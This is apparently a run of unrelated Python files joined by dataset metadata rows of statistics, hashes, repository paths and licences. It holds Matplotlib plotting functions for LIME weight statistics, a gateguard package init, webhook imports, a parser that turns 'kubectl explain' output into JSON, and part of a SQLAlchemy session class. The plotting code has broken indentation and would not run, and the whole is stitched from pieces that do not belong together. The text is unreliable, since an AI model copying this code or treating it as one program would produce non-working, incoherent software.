# axs[1].set_ylim(y2_min, y2_max)
axs[1].set_yticks(np.around(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4), decimals=2))
axs[1].set_ylim(y2_min-0.01, y2_max+0.01)
x_y_title_font_setting_1 = {'family': 'Times New Roman',
'weight': 'normal',
'size': 18}
# axs[1].set_ylabel('Variance of Abs(Weights)', fontdict=x_y_title_font_setting_1)
# axs[1].set_xlabel('EIS Points Order', fontdict=x_y_title_font_setting_1)
# axs[1].text(25, 0.9*(y2_max-y2_min)+y2_min, 'Low', size=18, family = "Times New Roman")
# axs[1].text(75, 0.9*(y2_max-y2_min)+y2_min, 'Middle', size=18, family = "Times New Roman")
# axs[1].text(125, 0.9*(y2_max-y2_min)+y2_min, 'High', size=18, family = "Times New Roman")
    axs[1].axvline(53, linestyle='--', color='red')  # red dashed line
    axs[1].axvline(106, linestyle='--', color='red')  # red dashed line
    # Horizontal lines marking the per-zone means of the Var curve
axs[1].plot(np.arange(53), np.ones(53)*avg_var_high, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(53, 106), np.ones(53)*avg_var_mid, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(106, 160), np.ones(54)*avg_var_low, linestyle='-.', color='green', linewidth=3)
    # Tick-label font size in the lower plot
    axs[1].tick_params(labelsize=14)
    # Adjust the (x) and y tick-label fonts in the lower plot
    labels = axs[1].get_xticklabels() + axs[1].get_yticklabels()
    [label.set_fontname('Times New Roman') for label in labels]
plt.show()
def my_shareX_2Y_plot_4_RF_0(x_arr, y1_arr, y2_arr, w_type):
"""
Function
        Plot the RF LIME results
:param
w_type: str
'w', raw/original weight
'abs', the Abs(w)
'positive', only keep the weight with positive value
:return:
"""
    # Per-zone means of the Avg curve over the high/middle/low-frequency thirds
    avg_avg_high = np.mean(y1_arr[:int(y1_arr.shape[0] / 3)])
    avg_avg_mid = np.mean(y1_arr[int(y1_arr.shape[0] / 3) : int(2 * y1_arr.shape[0] / 3)])
    avg_avg_low = np.mean(y1_arr[int(2 * y1_arr.shape[0] / 3) : ])
    # Per-zone means of the Var curve over the high/middle/low-frequency thirds
    avg_var_high = np.mean(y2_arr[:int(y2_arr.shape[0] / 3)])
    avg_var_mid = np.mean(y2_arr[int(y2_arr.shape[0] / 3) : int(2 * y2_arr.shape[0] / 3)])
    avg_var_low = np.mean(y2_arr[int(2 * y2_arr.shape[0] / 3) : ])
    # A 3D surface plot is roughly 4:3; scaled up 3x here to 12:9
    fig, axs = plt.subplots(2, 1, figsize=(12, 9), sharex=True)
    # Tick-label font size on both axes
    # plt.tick_params(labelsize=30)
    # Remove horizontal space between axes
    fig.subplots_adjust(hspace=0)
    # Axis label/title text and the corresponding font format
x_y_title_font_setting = {'family': 'Times New Roman',
'weight': 'normal',
'size': 18}
# Plot each graph, and manually set the y tick values
axs[0].plot(x_arr, y1_arr)
y1_min, y1_max = np.min(y1_arr), np.max(y1_arr)
    # The commented variant hugs the y-limits, and its ticks carry four decimal places (too many; two suffice)
# axs[0].set_yticks(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4))
# axs[0].set_ylim(y1_min, y1_max)
axs[0].set_yticks(np.around(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4), decimals=4))
y1_range = y1_max - y1_min
axs[0].set_ylim(y1_min - 0.1 * y1_range, y1_max + 0.1 * y1_range)
# axs[0].set_xlabel('distance (m)')
if w_type == 'abs':
axs[0].set_ylabel('Average of Abs(Weights)', fontdict=x_y_title_font_setting)
elif w_type == 'positive':
axs[0].set_ylabel('Average of Positive Weights', fontdict=x_y_title_font_setting)
elif w_type == 'w':
axs[0].set_ylabel('Average of Weights', fontdict=x_y_title_font_setting)
    # Adjust the (x) and y tick-label fonts in the upper plot
    labels = axs[0].get_yticklabels()
    [label.set_fontname('Times New Roman') for label in labels]
    # Add text via plt.text and set its font color: https://blog.csdn.net/m0_38139098/article/details/104739475
# axs[0].text(25, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(75, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(125, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
axs[0].text(10, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
axs[0].text(65, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
axs[0].text(120, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
    axs[0].axvline(53, linestyle='--', color='red')  # red dashed line
    axs[0].axvline(106, linestyle='--', color='red')  # red dashed line
    # Horizontal lines marking the per-zone means of the Avg curve
axs[0].plot(np.arange(53), np.ones(53)*avg_avg_high, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(53, 106), np.ones(53)*avg_avg_mid, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(106, 160), np.ones(54)*avg_avg_low, linestyle='-.', color='green', linewidth=3)
    # Tick-label font size in the upper plot
axs[0].tick_params(labelsize=14)
axs[1].plot(x_arr, y2_arr)
y2_min, y2_max = np.min(y2_arr), np.max(y2_arr)
    # The commented variant hugs the y-limits, and its ticks carry four decimal places (too many; two suffice)
# axs[1].set_yticks(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4))
# axs[1].set_ylim(y2_min, y2_max)
axs[1].set_yticks(np.around(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4), decimals=6))
y2_range = y2_max - y2_min
axs[1].set_ylim(y2_min - 0.1 * y2_range, y2_max + 0.1 * y2_range)
if w_type == 'abs':
axs[1].set_ylabel('Variance of Abs(Weights)', fontdict=x_y_title_font_setting)
elif w_type == 'positive':
axs[1].set_ylabel('Variance of Positive Weights', fontdict=x_y_title_font_setting)
elif w_type == 'w':
axs[1].set_ylabel('Variance of Weights', fontdict=x_y_title_font_setting)
axs[1].set_xlabel('EIS Points Order', fontdict=x_y_title_font_setting)
# axs[1].text(25, 0.9*(y2_max-y2_min)+y2_min, 'Low', size=18, family = "Times New Roman")
# axs[1].text(75, 0.9*(y2_max-y2_min)+y2_min, 'Middle', size=18, family = "Times New Roman")
# axs[1].text(125, 0.9*(y2_max-y2_min)+y2_min, 'High', size=18, family = "Times New Roman")
    axs[1].axvline(53, linestyle='--', color='red')  # red dashed line
    axs[1].axvline(106, linestyle='--', color='red')  # red dashed line
    # Horizontal lines marking the per-zone means of the Var curve
axs[1].plot(np.arange(53), np.ones(53)*avg_var_high, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(53, 106), np.ones(53)*avg_var_mid, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(106, 160), np.ones(54)*avg_var_low, linestyle='-.', color='green', linewidth=3)
    # Tick-label font size in the lower plot
    axs[1].tick_params(labelsize=14)
    # Adjust the (x) and y tick-label fonts in the lower plot
    labels = axs[1].get_xticklabels() + axs[1].get_yticklabels()
    [label.set_fontname('Times New Roman') for label in labels]
plt.show()
def my_shareX_2Y_plot_4_RF_1(x_arr, y1_arr, y2_arr, w_type):
"""
Function
        Plot the RF LIME results
:param
w_type: str
'w', raw/original weight
'abs', the Abs(w)
'positive', only keep the weight with positive value
:return:
"""
    # Per-zone means of the Avg curve over the high/middle/low-frequency thirds
    avg_avg_high = np.mean(y1_arr[:int(y1_arr.shape[0] / 3)])
    avg_avg_mid = np.mean(y1_arr[int(y1_arr.shape[0] / 3) : int(2 * y1_arr.shape[0] / 3)])
    avg_avg_low = np.mean(y1_arr[int(2 * y1_arr.shape[0] / 3) : ])
    # Per-zone means of the Var curve over the high/middle/low-frequency thirds
    avg_var_high = np.mean(y2_arr[:int(y2_arr.shape[0] / 3)])
    avg_var_mid = np.mean(y2_arr[int(y2_arr.shape[0] / 3) : int(2 * y2_arr.shape[0] / 3)])
    avg_var_low = np.mean(y2_arr[int(2 * y2_arr.shape[0] / 3) : ])
    # A 3D surface plot is roughly 4:3; scaled up 3x here to 12:9
    fig, axs = plt.subplots(2, 1, figsize=(12, 9), sharex=True)
    # Tick-label font size on both axes
    # plt.tick_params(labelsize=30)
    # Remove horizontal space between axes
    fig.subplots_adjust(hspace=0)
    # Axis label/title text and the corresponding font format
x_y_title_font_setting = {'family': 'Times New Roman',
'weight': 'normal',
'size': 18}
# Plot each graph, and manually set the y tick values
axs[0].plot(x_arr, y1_arr)
y1_min, y1_max = np.min(y1_arr), np.max(y1_arr)
    # The commented variant hugs the y-limits, and its ticks carry four decimal places (too many; two suffice)
# axs[0].set_yticks(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4))
# axs[0].set_ylim(y1_min, y1_max)
axs[0].set_yticks(np.around(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4), decimals=4))
y1_range = y1_max - y1_min
axs[0].set_ylim(y1_min - 0.1 * y1_range, y1_max + 0.1 * y1_range)
# axs[0].set_xlabel('distance (m)')
# if w_type == 'abs':
# axs[0].set_ylabel('Average of Abs(Weights)', fontdict=x_y_title_font_setting)
# elif w_type == 'positive':
# axs[0].set_ylabel('Average of Positive Weights', fontdict=x_y_title_font_setting)
# elif w_type == 'w':
# axs[0].set_ylabel('Average of Weights', fontdict=x_y_title_font_setting)
    # Adjust the (x) and y tick-label fonts in the upper plot
    labels = axs[0].get_yticklabels()
    [label.set_fontname('Times New Roman') for label in labels]
    # Add text via plt.text and set its font color: https://blog.csdn.net/m0_38139098/article/details/104739475
# axs[0].text(25, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(75, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(125, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
# axs[0].text(10, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(65, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(120, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
    axs[0].axvline(53, linestyle='--', color='red')  # red dashed line
    axs[0].axvline(106, linestyle='--', color='red')  # red dashed line
    # Horizontal lines marking the per-zone means of the Avg curve
axs[0].plot(np.arange(53), np.ones(53)*avg_avg_high, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(53, 106), np.ones(53)*avg_avg_mid, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(106, 160), np.ones(54)*avg_avg_low, linestyle='-.', color='green', linewidth=3)
    # Tick-label font size in the upper plot
axs[0].tick_params(labelsize=14)
axs[1].plot(x_arr, y2_arr)
y2_min, y2_max = np.min(y2_arr), np.max(y2_arr)
    # The commented variant hugs the y-limits, and its ticks carry four decimal places (too many; two suffice)
# axs[1].set_yticks(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4))
# axs[1].set_ylim(y2_min, y2_max)
axs[1].set_yticks(np.around(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4), decimals=6))
y2_range = y2_max - y2_min
axs[1].set_ylim(y2_min - 0.1 * y2_range, y2_max + 0.1 * y2_range)
# if w_type == 'abs':
# axs[1].set_ylabel('Variance of Abs(Weights)', fontdict=x_y_title_font_setting)
# elif w_type == 'positive':
# axs[1].set_ylabel('Variance of Positive Weights', fontdict=x_y_title_font_setting)
# elif w_type == 'w':
# axs[1].set_ylabel('Variance of Weights', fontdict=x_y_title_font_setting)
# axs[1].set_xlabel('EIS Points Order', fontdict=x_y_title_font_setting)
# axs[1].text(25, 0.9*(y2_max-y2_min)+y2_min, 'Low', size=18, family = "Times New Roman")
# axs[1].text(75, 0.9*(y2_max-y2_min)+y2_min, 'Middle', size=18, family = "Times New Roman")
# axs[1].text(125, 0.9*(y2_max-y2_min)+y2_min, 'High', size=18, family = "Times New Roman")
    axs[1].axvline(53, linestyle='--', color='red')  # red dashed line
    axs[1].axvline(106, linestyle='--', color='red')  # red dashed line
    # Horizontal lines marking the per-zone means of the Var curve
axs[1].plot(np.arange(53), np.ones(53)*avg_var_high, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(53, 106), np.ones(53)*avg_var_mid, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(106, 160), np.ones(54)*avg_var_low, linestyle='-.', color='green', linewidth=3)
    # Tick-label font size in the lower plot
    axs[1].tick_params(labelsize=14)
    # Adjust the (x) and y tick-label fonts in the lower plot
    labels = axs[1].get_xticklabels() + axs[1].get_yticklabels()
    [label.set_fontname('Times New Roman') for label in labels]
plt.show()
def test_0():
    # Greek letters
plt.plot([0, 1, 2], [0, 1, 2], label=r"$\alpha$")
    # Put an overline above a letter
    plt.plot([0, 1, 2], [0, 1, 2], label=r"$\overline{a}$")
    plt.plot([0, 1, 2], [0, 1, 2], label=r"$\overline{\overline{a}}$")  # was r"$\overline{$\overline{a}$}$"; nested $...$ is invalid mathtext
    # Bold font
# plt.plot([0, 1, 2], [0, 1, 2], label=r"$\alpha$", fontdict={'weight': 'bold'})
plt.legend(loc='best')
plt.show()
# test_0()
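# Minimal usage sketch (synthetic data; 160 points so the hard-coded splits at
# x = 53 and x = 106 line up with the high/middle/low-frequency thirds):
# x = np.arange(160)
# y1 = np.abs(np.sin(x / 10.0)) / (1.0 + x)      # stand-in for Average of Abs(Weights)
# y2 = np.abs(np.cos(x / 10.0)) * 1e-3           # stand-in for Variance of Abs(Weights)
# my_shareX_2Y_plot_4_RF_0(x, y1, y2, w_type='abs')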
| 43.619522
| 137
| 0.633831
| 3,681
| 21,897
| 3.576745
| 0.059223
| 0.027647
| 0.052332
| 0.06494
| 0.969315
| 0.965821
| 0.961036
| 0.946757
| 0.943947
| 0.943795
| 0
| 0.07659
| 0.186692
| 21,897
| 502
| 138
| 43.619522
| 0.662699
| 0.37649
| 0
| 0.836634
| 0
| 0
| 0.078069
| 0.002062
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029703
| false
| 0
| 0.009901
| 0
| 0.039604
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7273000883820ef48d0809af01c4fa0b32360a5e
| 595
|
py
|
Python
|
gateguard/__init__.py
|
pyvim/gateguard
|
78ffd55139a0290a9a3c521290c01fe8bb6a15bd
|
[
"MIT"
] | null | null | null |
gateguard/__init__.py
|
pyvim/gateguard
|
78ffd55139a0290a9a3c521290c01fe8bb6a15bd
|
[
"MIT"
] | null | null | null |
gateguard/__init__.py
|
pyvim/gateguard
|
78ffd55139a0290a9a3c521290c01fe8bb6a15bd
|
[
"MIT"
] | null | null | null |
# coding=utf-8
from .fields import (
BooleanField,
StringField,
IntegerField,
FloatField,
ChoiceField,
ArrayField,
MultipleChoiceField,
URLField,
RegexMatchField,
HostField,
SlugField,
MapField
)
from .schema import Schema
from .exceptions import ValidationError
__all__ = (
'BooleanField',
'StringField',
'IntegerField',
'FloatField',
'ChoiceField',
'ArrayField',
'MultipleChoiceField',
'URLField',
'RegexMatchField',
'HostField',
'SlugField',
'MapField',
'Schema',
'ValidationError',
)
| 16.081081
| 39
| 0.636975
| 41
| 595
| 9.146341
| 0.536585
| 0.122667
| 0.186667
| 0.24
| 0.714667
| 0.714667
| 0.714667
| 0.714667
| 0.714667
| 0.714667
| 0
| 0.002257
| 0.255462
| 595
| 36
| 40
| 16.527778
| 0.844244
| 0.020168
| 0
| 0
| 0
| 0
| 0.266781
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.09375
| 0
| 0.09375
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72b3b25838265f15da07653e7ac94df170fdaeb3
| 118
|
py
|
Python
|
src/webhooks/backends/__init__.py
|
Welltory/zoom2youtube
|
91fc12a0f83012fa5664caf3bffa1246e272b205
|
[
"MIT"
] | 64
|
2017-08-17T12:28:37.000Z
|
2022-03-28T11:43:29.000Z
|
src/webhooks/backends/__init__.py
|
Welltory/zoom2youtube
|
91fc12a0f83012fa5664caf3bffa1246e272b205
|
[
"MIT"
] | 8
|
2018-07-25T18:00:06.000Z
|
2021-05-27T04:33:32.000Z
|
src/webhooks/backends/__init__.py
|
Welltory/zoom2youtube
|
91fc12a0f83012fa5664caf3bffa1246e272b205
|
[
"MIT"
] | 19
|
2019-01-25T23:11:28.000Z
|
2022-01-15T09:52:13.000Z
|
from webhooks.backends.slack import *
from webhooks.backends.zapier import *
from webhooks.backends.welltory import *
| 29.5
| 40
| 0.822034
| 15
| 118
| 6.466667
| 0.466667
| 0.371134
| 0.618557
| 0.536082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 118
| 3
| 41
| 39.333333
| 0.915094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
72bd9b452f19426f5db879155320aca5c7a16812
| 8,709
|
py
|
Python
|
python-scripts/parse_data_from_kubectl_command/main.py
|
MohanSai1997/kubernaml
|
e839d01f5792f2a860ef3ade79f529000a728a66
|
[
"MIT"
] | 1
|
2020-03-29T11:04:18.000Z
|
2020-03-29T11:04:18.000Z
|
python-scripts/parse_data_from_kubectl_command/main.py
|
MohanSai1997/kuber-yaml-gen
|
e839d01f5792f2a860ef3ade79f529000a728a66
|
[
"MIT"
] | 2
|
2022-02-19T06:46:02.000Z
|
2022-02-27T10:39:01.000Z
|
python-scripts/parse_data_from_kubectl_command/main.py
|
MohanSai1997/kuber-yaml-gen
|
e839d01f5792f2a860ef3ade79f529000a728a66
|
[
"MIT"
] | 2
|
2021-11-19T15:36:20.000Z
|
2022-01-24T07:45:27.000Z
|
# Parses the output of "kubectl explain deployment --recursive" into a JSON skeleton
fr = open("data (1).txt", "r")
# fr = open("data.txt", "r")
fw = open("json_data.json", "a")
parse_arr = fr.readlines()[12:]  # skip the header; keep the lines under "FIELDS:"
fw.write("{ \n")
current_location_path = {}
past_space_count = 3
object_state_arr = []
def function_write_data(arr_element, present_space_count):
"""
    Write the closing "}" or "}]" for each nesting level being exited
"""
print("ARRAY", arr_element[::-1])
for i in arr_element[::-1]:
if i == 0:
fw.write(" "*present_space_count + "}, \n")
else:
fw.write( " "*present_space_count + "}], \n")
def remove_arr_elements(arr_element, count):
"""
Remove the elements from object_state_arr
"""
for _ in range(count):
arr_element.pop()
return arr_element
for i in parse_arr:
element_name = i.split('\t')[0]
property_name = element_name.strip() # parsing the property name
present_space_count = element_name.count(" ")
if "<map[string]string>" in i:
if present_space_count < past_space_count:
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{}],\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{}],\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{}],\n")
if "<string>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \" ,\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \" ,\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \" ,\n")
if "<[]string>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [\"\"],\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [\"\"],\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [\"\"],\n")
if "<integer>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": 0 ,\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": 0 ,\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": 0 ,\n")
if "<boolean>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \", \n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \", \n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \", \n" )
if "<[]Object>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{\n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
object_state_arr.append(1)
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{\n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
object_state_arr.append(1)
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{\n" )
object_state_arr.append(1)
if "<Object>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": {\n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
object_state_arr.append(0)
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": {\n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
object_state_arr.append(0)
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": {\n" )
object_state_arr.append(0)
past_space_count = present_space_count
function_write_data(object_state_arr, 2)
fw.write("} \n")
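# Input format assumed from `kubectl explain deployment --recursive` (illustrative
# excerpt): field names indented in steps of three spaces, then a tab, then a type tag:
#
#   FIELDS:
#      apiVersion\t<string>
#      spec\t<Object>
#         replicas\t<integer>
#         template\t<Object>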
| 53.759259
| 155
| 0.60604
| 1,090
| 8,709
| 4.400917
| 0.065138
| 0.233479
| 0.230561
| 0.126954
| 0.88326
| 0.882843
| 0.85345
| 0.85345
| 0.85345
| 0.853033
| 0
| 0.011296
| 0.24779
| 8,709
| 161
| 156
| 54.093168
| 0.720959
| 0.026409
| 0
| 0.730435
| 0
| 0
| 0.085101
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017391
| false
| 0
| 0
| 0
| 0.026087
| 0.008696
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
72c2ce111f5ff74ca5701349c030f5fad18a0d83
| 71,043
|
py
|
Python
|
ganimides_server/ganimides_database/_database_class_session.py
|
leandrou-technology-forward/api_server
|
0a41335a45f179ba831799722dc049a98ed9c094
|
[
"MIT"
] | null | null | null |
ganimides_server/ganimides_database/_database_class_session.py
|
leandrou-technology-forward/api_server
|
0a41335a45f179ba831799722dc049a98ed9c094
|
[
"MIT"
] | 1
|
2021-06-02T00:31:50.000Z
|
2021-06-02T00:31:50.000Z
|
ganimides_server/ganimides_database/_database_class_session.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
if not (os.path.dirname(__file__) in sys.path): sys.path.append(os.path.dirname(__file__))
import datetime
import uuid
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import text
#from sqlalchemy.engine import ddl
#from sqlalchemy import create_engine
#from sqlalchemy import MetaData
#from sqlalchemy import inspect
from _serverApp import thisApp
from _serverApp import get_debug_option_as_level,get_debug_files,get_debug_level,Fore
from _serverApp import log_process_message, log_process_result, log_process_data, log_process_input, log_process_result_message, log_message
from _serverApp import set_process_identity_dict, set_process_caller_area, get_globals_from_configuration, set_msgID  # set_msgID is used below; assumed to live in _serverApp like its siblings
from _serverApp import add_methods_to_configuration, get_module_debug_level,retrieve_module_configuration
from _serverApp import build_process_signature, build_process_call_area
#from sqlalchemy.ext.declarative import declarative_base
#from _serverApp import thisApp
# from _database_class_session import leandroutechnologyforward_database_session_class as db_session_class
# from _database_class_table import leandroutechnologyforward_database_table_class as db_table_class
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
module_ProgramName = os.path.splitext(os.path.basename(__file__))[0]
module_id = '{}'.format(module_ProgramName)
module_version = 0.1
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# classes
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
class leandroutechnologyforward_database_session_class:
engine = None
session = None
schema = None
debug = False
session_id=None
def __init__(self, engine, session=None, schema_dictionary={},session_id=None,debug=None):
self.engine = engine
if not session:
Session = sessionmaker(bind=self.engine)
session = Session()
self.session = session
self.schema = schema_dictionary
self.session_id = session_id
self.debug = get_debug_option_as_level(debug)
